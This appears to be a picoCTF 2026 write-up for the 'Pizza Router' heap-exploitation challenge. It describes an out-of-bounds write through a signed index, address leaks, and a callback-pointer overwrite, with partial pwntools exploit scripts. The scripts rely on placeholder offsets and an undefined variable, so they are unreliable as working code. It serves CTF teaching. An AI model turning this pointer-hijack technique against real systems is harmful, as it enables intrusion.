picoCTF Solutions
picoCTF 2026Binary ExploitationMedium

Pizza Router

Published: March 20, 2026

Description

Plan the fastest pizza drone routes and snag a slice of the flag. Download `router` plus `city1.map`, `city2.map`, and `city3.map`, then optimize the delivery path.

Setup

Download router

Download router and the map files (city1.map, city2.map, city3.map).

Run the binary and understand what input format it expects.

chmod +x router
./router city1.map

Solution

  1. Step 1Identify the OOB write in the reroute command
    The binary has a `reroute <id> <new_index>` command that stores a signed integer index without bounds checking. A negative index writes out-of-bounds on the heap, allowing you to corrupt adjacent heap metadata and overwrite heap pointers. This is the core vulnerability.
    chmod +x router
    ./router city1.map
    # Commands available: route, reroute, replay, receipt, dispatch, finish
  2. Step 2Leak PIE base and heap address
    Use the `replay <id>` command to leak a binary address at heap offset +0x2260 (PIE base). Use the `receipt <id>` command to leak a heap pointer. Compute PIE base from the leaked address.
    python3 << 'EOF' from pwn import * p = remote("<HOST>", <PORT_FROM_INSTANCE>) # or: p = process(["./router", "city1.map"]) # Trigger route allocation p.sendlineafter(b"> ", b"route 0 1") # create a route entry # Leak PIE base via replay command (reads heap + 0x2260) p.sendlineafter(b"> ", b"replay 0") leak_data = p.recvline() pie_leak = int(leak_data.split()[-1], 16) pie_base = pie_leak - 0x2260 # adjust offset from binary analysis log.info(f"PIE base: {hex(pie_base)}") # Leak heap pointer via receipt command p.sendlineafter(b"> ", b"receipt 0") heap_data = p.recvline() heap_leak = int(heap_data.split()[-1], 16) heap_base = heap_leak - 0x??? # adjust offset log.info(f"Heap base: {hex(heap_base)}") EOF
  3. Step 3Overwrite the finish callback at heap offset +0x430
    Using the OOB write via `reroute` with a negative index, overwrite the `finish` callback function pointer stored at heap offset +0x430 with the address of the win function or a one_gadget. Then call `dispatch` to trigger the overwritten callback.
    python3 << 'EOF' from pwn import * p = remote("<HOST>", <PORT_FROM_INSTANCE>) # After leaking addresses, compute the target and payload win_addr = pie_base + 0x???? # address of win/print_flag function # Negative index for OOB write -- reroute <id> <negative_idx> # The exact offset depends on heap layout analysis p.sendlineafter(b"> ", f"reroute 0 -<OFFSET>".encode()) # Write win_addr bytes into the finish callback slot at +0x430 # Trigger the overwritten callback p.sendlineafter(b"> ", b"dispatch") print(p.recvall()) EOF

Flag

picoCTF{p1zz4_r0ut3r_...}

Pizza Router is a heap exploitation challenge. The `reroute` command uses a signed index without bounds checking -- a negative value performs an OOB write on the heap. Leak PIE base via `replay` (offset +0x2260) and heap via `receipt`, then overwrite the `finish` callback at offset +0x430 and call `dispatch` to win.